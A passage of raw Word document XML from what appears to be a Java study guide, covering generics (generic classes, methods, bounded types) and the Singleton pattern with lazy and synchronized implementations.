        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>name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lice"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292E83C4" w14:textId="553367F7"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4026816"/>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No cast needed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D1A963" w14:textId="77777777" w:rsidR="005214B6" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00D038A9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="62DC49AE">
          <v:rect id="_x0000_i1111" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5C1926" w14:textId="77777777" w:rsidR="005214B6" w:rsidRPr="00CE4B95" w:rsidRDefault="005214B6" w:rsidP="00D038A9">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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Generic Class Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38191708" w14:textId="77777777"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Box</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T</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5955C0F" w14:textId="77777777"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T item</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF9703C" w14:textId="77777777"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25537DE6" w14:textId="77777777"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 ite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F119AB4" w14:textId="77777777"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te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tem</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31689D12" w14:textId="77777777"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55E7F6D" w14:textId="77777777"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654B41CD" w14:textId="77777777"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T </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3284113" w14:textId="77777777"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item</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A552316" w14:textId="77777777"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782E837" w14:textId="0950BD6E"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F60E78" w14:textId="1E2C67A3" w:rsidR="005214B6" w:rsidRPr="00CE4B95" w:rsidRDefault="005214B6" w:rsidP="00D038A9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Usage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE9F3C5" w14:textId="77777777"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7732682"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Box</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stringBox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Box</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D39C474" w14:textId="77777777"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7732682"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>stringBox</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se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ello"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D6DAAF" w14:textId="42887E69"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7732682"/>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ingBox</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p>
    <w:p w14:paraId="201B07C0" w14:textId="77777777" w:rsidR="005214B6" w:rsidRPr="00CE4B95" w:rsidRDefault="005214B6" w:rsidP="00D038A9">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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Generic Method Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9927BD" w14:textId="77777777"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93742"/>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T</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printArr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D9676F9" w14:textId="77777777"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937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T eleme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05EE4DB" w14:textId="77777777"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937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lement</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437E7A74" w14:textId="77777777"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937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527952D" w14:textId="07097339"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93742"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125EF107" w14:textId="77777777" w:rsidR="005214B6" w:rsidRPr="00CE4B95" w:rsidRDefault="005214B6" w:rsidP="00D038A9">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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Bounded Generics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D480969" w14:textId="77777777"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225947"/>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alculator</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T </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>extend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Numb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F9DD8D0" w14:textId="77777777"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22594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double</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> squar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 n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5936AF8" w14:textId="77777777"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22594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n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oubleValu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oubleValue</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137B89E8" w14:textId="77777777"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22594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09714BB" w14:textId="64E07354"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225947"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763F5D79" w14:textId="77777777" w:rsidR="005214B6" w:rsidRPr="00CE4B95" w:rsidRDefault="005214B6" w:rsidP="00D038A9">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Common Use in Collections:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA06578" w14:textId="15707F5D" w:rsidR="00E24935" w:rsidRPr="00CE4B9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103414"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> studentMark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p>
    <w:p w14:paraId="1DE7A3AD" w14:textId="77777777" w:rsidR="005214B6" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00D038A9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="50C37DA2">
          <v:rect id="_x0000_i1112" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="32154647" w14:textId="0FB43BB4" w:rsidR="00502865" w:rsidRPr="00CE4B95" w:rsidRDefault="00E62D5A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc196307505"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is Singleton in java</w:t>
      </w:r>
      <w:r w:rsidR="00502865" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="33D67A2B" w14:textId="174C3CA0" w:rsidR="00F21583" w:rsidRPr="00CE4B95" w:rsidRDefault="00F21583" w:rsidP="00E71BCB">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Singleton</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>design pattern</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that ensures </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>only one instance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of a class exists throughout the application and provides a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>global access point</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to that instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46199465" w14:textId="77777777" w:rsidR="00F21583" w:rsidRPr="00CE4B95" w:rsidRDefault="00F21583" w:rsidP="00E71BCB">
      <w:pPr>
        <w:ind w:firstLine="36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s commonly used for things like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312022D5" w14:textId="77777777" w:rsidR="00E71BCB" w:rsidRPr="00CE4B95" w:rsidRDefault="00F21583">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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figuration classes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22427140" w14:textId="77777777" w:rsidR="00E71BCB" w:rsidRPr="00CE4B95" w:rsidRDefault="00F21583">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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gger classes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697D544C" w14:textId="77777777" w:rsidR="00E71BCB" w:rsidRPr="00CE4B95" w:rsidRDefault="00F21583">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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atabase connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01528A77" w14:textId="270798CA" w:rsidR="00F21583" w:rsidRPr="00CE4B95" w:rsidRDefault="00F21583">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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ching mechanisms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0BBFD7" w14:textId="77777777" w:rsidR="00F21583" w:rsidRPr="00CE4B95" w:rsidRDefault="00F21583" w:rsidP="00E71BC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Characteristics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1BCDEF" w14:textId="77777777" w:rsidR="00FC4D88" w:rsidRPr="00CE4B95" w:rsidRDefault="00F21583">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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ivate constructor</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – so no other class can instantiate it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09294058" w14:textId="77777777" w:rsidR="00FC4D88" w:rsidRPr="00CE4B95" w:rsidRDefault="00F21583">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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instance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – holds the single instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04EEC50F" w14:textId="3B716B2C" w:rsidR="00F21583" w:rsidRPr="00CE4B95" w:rsidRDefault="00F21583">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Public static method</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – provides access to the instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C370CF4" w14:textId="77777777" w:rsidR="00F21583" w:rsidRPr="00CE4B95" w:rsidRDefault="00F21583" w:rsidP="00E71BC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Basic Singleton Implementation (Lazy Initialization):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212B76A3" w14:textId="77777777"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Singlet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B730B6E" w14:textId="77777777"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Singleton</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> instance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278A47FD" w14:textId="77777777"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF88441" w14:textId="77777777"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Singlet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EF6BF88" w14:textId="77777777"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ivate constructor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1E7914" w14:textId="77777777"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B17E8B4" w14:textId="77777777"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4725B8" w14:textId="77777777"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Singleton</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> getInstan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77EE600" w14:textId="77777777"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nstanc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A4A65E4" w14:textId="77777777"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            instanc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Singleton</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2333B824" w14:textId="77777777"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22C0E87" w14:textId="77777777"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instance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F361587" w14:textId="77777777"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93F2F7C" w14:textId="3A09BA66"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DE3DB8" w14:textId="77777777" w:rsidR="00F21583" w:rsidRPr="00CE4B95" w:rsidRDefault="00F21583" w:rsidP="00E71BC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Thread-Safe Singleton (Synchronized Method):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3355E9DA" w14:textId="77777777"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Singlet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1F92EAF" w14:textId="77777777"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Singleton</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> instance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F80A4EC" w14:textId="77777777"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1543D82B" w14:textId="77777777"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Singlet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6C89959" w14:textId="77777777"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
